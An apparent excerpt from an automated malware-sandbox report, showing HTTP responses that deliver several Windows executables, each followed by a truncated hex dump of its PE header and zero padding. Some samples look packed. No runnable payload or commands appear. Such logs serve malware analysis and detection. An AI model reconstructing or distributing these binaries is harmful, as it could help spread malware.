00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Jul 2024 20:20:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Jul 2024 20:20:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Jul 2024 20:20:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Jul 2024 20:20:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Jul 2024 20:20:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 04 Jul 2024 20:20:37 GMTContent-Type: application/octet-streamContent-Length: 1906688Last-Modified: Thu, 04 Jul 2024 20:03:38 GMTConnection: keep-aliveETag: "6687001a-1d1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 a0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 4b 00 00 04 00 00 d3 a3 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 8d 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 8c 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6f 73 75 75 66 71 65 00 00 1a 00 00 90 31 00 00 00 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 78 6e 6c 74 65 74 77 00 10 00 00 00 90 4b 00 00 04 00 00 00 f2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 4b 00 00 22 00 00 00 f6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 04 Jul 2024 20:21:04 GMTContent-Type: application/octet-streamContent-Length: 2533376Last-Modified: Thu, 04 Jul 2024 19:57:26 GMTConnection: keep-aliveETag: "6686fea6-26a800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c8 e6 86 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 fc 0d bf 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 bf 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 e0 9c 00 65 0e 00 00 88 ee 9c 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 9c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 f0 78 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 80 22 00 00 b0 9c 00 00 74 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
